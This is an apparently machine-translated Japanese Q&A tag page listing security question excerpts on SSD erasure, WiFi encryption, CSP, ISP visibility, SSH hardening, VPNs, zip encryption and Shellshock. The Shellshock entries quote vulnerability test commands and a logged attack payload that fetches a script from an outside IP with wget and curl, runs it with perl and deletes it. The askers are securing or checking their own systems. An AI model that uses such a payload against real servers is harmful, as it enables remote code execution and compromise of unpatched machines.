タグ付けされた質問 「security」

コンピューターシステムと情報の盗難やデータ破壊などの脅威からの保護。

6
SSDに保存されているファイルを安全に削除する方法は?
SSDに関する(非常に長いですが、読む価値のある)記事から: OSでファイルを削除しても、ハードドライブまたはSSDからの反応はありません。実際にデータを失うのは、セクター(ハードドライブ)またはページ(SSD)を上書きするまでではありません。ファイル回復プログラムはこのプロパティを活用して、削除されたファイルの回復を支援します。 ただし、HDDとSSDの主な違いは、ファイルを上書きするとどうなるかです。HDDは新しいデータを同じセクターに単純に書き込むことができますが、SSDは上書きされたデータに新しい(または以前に使用された)ページを割り当てます。現在無効なデータを含むページは、単に無効としてマークされ、ある時点で消去されます。 それでは、SSDに保存されているファイルを安全に消去する最良の方法は何でしょうか?ハードディスクから(「シュレッド」ユーティリティを使用して)使用されているようにランダムデータで上書きすることは、完全なドライブを上書きしない限り機能しません...
4
パスワードなしで暗号化されたWiFi?
WiFi接続を暗号化できるが、パスワードは不要な標準はありますか? (古い、弱い)WEP、および新しいWPA / WPA2にはパスワード(共有秘密)が必要であることを知っています。一方、自分のワイヤレス接続は「オープン」であり、したがって暗号化されていません。 ユーザーがパスワードを入力する必要のない暗号化リンクを使用できない技術的な理由はありません。このような技術は現在存在します(公開鍵暗号化およびを参照HTTPS)。 しかし、そのような標準はWiFiに存在しますか? 注:インターネットアクセスを制限するのではなく、通信を保護するだけです。 私はそのような標準が存在しないという感覚を得る(私はGoogleでかなり能力があるので)が、私はそれを確認したい。 明確化:インターネットアクセスを制限するのではなく、通信を保護したい。これは、ユーザーがパスワード(またはそれに相当するもの)を持っている必要がないことを意味します。つまり、ユーザーは不要です。 パスワードを知る パスフレーズを知る CAPTCHAを入力するには 秘密を描く キーフォブを持っている PINを知る 事前共有キーを使用するには 事前共有ファイルがある 証明書を所有する つまり、以前と同じアクセシビリティを備えていますが、暗号化されています。
5
ブックマークレットだけでFirefoxでCSPを無効にする方法は?
今日、コンテンツセキュリティポリシー(CSP)の制限により、https://github.com/でブックマークレットを実行できないことに気付きました。Firefoxで、ブックマークレットだけでCSPを無効にする方法はありますか? のsecurity.csp.enableオプションに気付きましたabout:configが、これによりCSPが完全に無効になります。ブックマークレットをアクティブにすると、次のメッセージがコンソールに記録されます。 Timestamp: 04/22/2013 02:39:05 PM Warning: CSP WARN: Directive inline script base restriction violated Source File: https://github.com/ Line: 0 Source Code: javascript:...
5
ISPはどのくらいの情報を見ることができますか?
この質問は、スーパーユーザーで回答できるため、サーバー障害から移行されました。 8年前に移行され ました。 ISPがWebサイトやチャットプログラムで入力したパスワードを見ることができますか?また、httpsで始まるSSL Webサイトについてはどうですか。ISPに到達する前にユーザー名とパスワードを暗号化しますか?
26 security  ssl  privacy  https  isp 
9
気が付かない場合、コンピューターが感染しているのはなぜ悪いのですか?[閉まっている]
私が直面している状況は、次のような立場の家族です。 動作するものを更新したくありません。更新すると何かが壊れる可能性があります。Windows 98を実行する古いコンピューターを見てください。私は15年間、毎日すべてを使用しており、ウイルス対策などは一切ありませんが、問題なく動作します。 同じ推論を使用して、彼はWindows XPを実行している他のコンピューターに更新プログラムまたはサービスパックをインストールすることを強く抵抗しました。 深刻なお金のために彼のコンピューターのためにいくつかのWindows 7を購入する、または Linuxに切り替え、基本的にコンピューターを最初から使用する方法を再学習しました。 コンピューターがマルウェアに感染していると、たとえ何も悪いことに気づかなくても悪いことを伝えるために、どのような事実を使用できますか?
25 security  malware 
4
Linuxで管理者ユーザーのパスワードを変更できるのはなぜですか?
数日前、私の友人は、パスワードを言わなくても私のLinuxを使用できることを見せたいと思っていました。 彼はGRUBに入り、回復モードオプションを選択しました。私の最初の問題は、彼がすでに私のファイルにアクセスしていたことです(読み取り専用)。彼はpasswdを実行しようとしましたが、失敗しました。その後、彼は何らかの再マウントを行い(書き込み権限を与えたと思います)、その後、彼は私のパスワードを変更することができました。 なぜこれが可能ですか?個人的にはセキュリティの問題だと思います。私が働いているところでは、Linuxを使用する人が何人かいますが、どちらにもBIOSパスワードが設定されていないか、その他の種類のセキュリティウォールがありません。
5
sshを備えた個人用サーバーをインターネットに対して開くことはどれほど危険ですか?
この質問は、スーパーユーザーで回答できるため、Server Faultから移行されました。 6年前に移行され ました。 タイトルの継続は「インターネットセキュリティに関する知識が限られている間」です。 私は最近、個人用のgitリポジトリとして使用することを目的に、debianを実行するローエンドコンピューターを備えた小さなサーバーをセットアップしました。私はsshを有効にしましたが、ブルートフォース攻撃などに苦しむその迅速さに驚きました。次に、これは非常に一般的であり、これらの攻撃を防ぐための基本的なセキュリティ対策について学びました(serverfaultでの質問と重複の多くは、これに対処します。たとえば、これまたはこれを参照してください)。 しかし、今、私はこれすべてが努力の価値があるかどうか疑問に思っています。私は自分のサーバーを主に楽しみのためにセットアップすることに決めました。gitbucket.org、bettercodes.orgなどが提供するようなサードパーティのソリューションに頼ることができます。楽しみの一部はインターネットセキュリティについて学ぶことですが、専門家になるのに十分な時間を費やし、私が正しい予防策を講じたことをほぼ確実にしました。 このおもちゃプロジェクトを引き続き使用するかどうかを判断するために、実際にリスクを負うことについて知りたいと思います。たとえば、ネットワークに接続されている他のコンピューターもどの程度脅威になりますか?これらのコンピューターの一部は、Windowsを実行しているものよりもさらに知識の少ない人々によって使用されています。 強力なパスワード、sshのルートアクセスの無効化、sshの非標準ポート、パスワードログインの無効化、fail2ban、denyhosts、iptablesルールのいずれかを使用するなどの基本的なガイドラインに従うと、実際に問題が発生する可能性はどれくらいですか? 別の言い方をすれば、恐れる必要のある大きな悪いオオカミはいますか、それともスクリプトの子供たちを追い払うことについてほとんどですか?
25 security  ssh  debian 
2
Windows 10では、すべてのトラフィックがVPNを通過することをどのように確認しますか?
Windows 10ですべてのトラフィックがVPNを通過するようにする最も簡単な方法は何ですか?組み込まれた方法はありますか?基本的に、VPNが失敗した場合のインターネットキルスイッチを探しています。 時々、OSが混乱し、何らかの理由でトラフィックを送信するときにVPNを使用しないことがありますが、これは実際に有効な懸念事項ですか?
7
debian testing / jessieのShellshockセキュリティ脆弱性を修正するにはどうすればよいですか?
テストコマンド x='() { :;}; echo vulnerable' bash 私のDebian 8(Jessie)のインストールは、最新のアップデートでも脆弱であることを示しています。調査によれば、安定版と不安定版のパッチがありますが、テストはパッチされていません。 パッチは数日でテストに到達するだろうと考えていますが、これは実際には偏執的になるほど厄介に見えます。不安定版からパッケージを取得し、システムを破壊せずにインストールする方法はありますか?不安定版にアップグレードすると、解決するよりも多くの問題が発生するようです。 Bobによると、2番目のShellshockの脆弱性があり、これは2番目のパッチで修正されています。それのテストは次のようになっています: env X='() { (a)=>\' bash -c "echo echo vuln"; [[ "$(cat echo)" == "vuln" ]] && echo "still vulnerable :(" しかし、私はこれが何を意味するのか、なぜそれが問題なのかを理解するのに十分なほどBashに熟練していません。いずれにせよ、それは編集の時に安定であり、かつ不安定ではなく、64ビットシステムでbash_4.3-9.2_amd64.debによって阻止される奇妙な何か、ないジェシー /テストを。 Jessieでこれを修正するには、unstableから最新のBashを入手し、でインストールしてくださいdpkg -i。 Jemenakeが提供する wget http://ftp.debian.org/debian/pool/main/b/bash/bash_4.3-9.2_$(dpkg --print-architecture).deb お使いのマシンの4.3-9.2バージョンを取得するコマンドとして。 そして、あなたはそれに続くことができます: sudo dpkg -i bash_4.3-9.2_$(dpkg --print-architecture).deb それをインストールします。 Jessieシステム用に不安定版からのパッチをさらに必要とする場合、これが明らかに進むべき方法です(必要な変更を加えたものです)。
2
zipの暗号化は本当に悪いですか?
圧縮と暗号化に関する長年の標準的なアドバイスは、zipの暗号化強度は悪いというものでした。 これは本当にこの日と年齢の場合ですか? WinZipに関するこの記事を読みました(同じ評判が悪かった)。その記事によると、パスワードを選択する際にいくつかの規則に従えば、問題は取り除かれます。 少なくとも12文字の長さ 辞書、一般的な単語、名前をランダムに含まない 少なくとも1つの大文字 少なくとも1つの小文字を持っている 少なくとも1つの数値文字がある $、£、*、%、&など、少なくとも1つの特殊文字を使用してください! これにより、 roughly 475,920,314,814,253,000,000,000 possible combinations to brute force 情報をバックアップするために、最近の(過去5年間と言う)リンクを提供してください。
3
これは攻撃なのか、それとも心配すべきものなのか?砲弾ショック?
access.log私のテストサーバーでこれを見ました: > 173.45.100.18 - - [26/Sep/2014:07:09:53 +0200] "GET /cgi-bin/hi HTTP/1.0" 404 490 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget > http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; > perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\"" アドレスはどれも私や私たちのIP範囲(またはその他の問題)に関連していません。すぐにShellshockのセキュリティバグ /「bashdoor」について考えていました。 実際に誰かがcurlサーバーに「何か」を試み、その「何か」を実行し、その後で「何か」を削除したように見えます-rf。 これは純粋なテストサーバーであり、害はありません(==再インストール以外に害はありません)-しかし、タイミングは非常に興味深いものです。私が思い出す限り、このようなものを見たことがありません。 心配する必要がありますか?これが何であるかについて誰にもアイデアがありますか?
弊社のサイトを使用することにより、あなたは弊社のクッキーポリシーおよびプライバシーポリシーを読み、理解したものとみなされます。
Licensed under cc by-sa 3.0 with attribution required.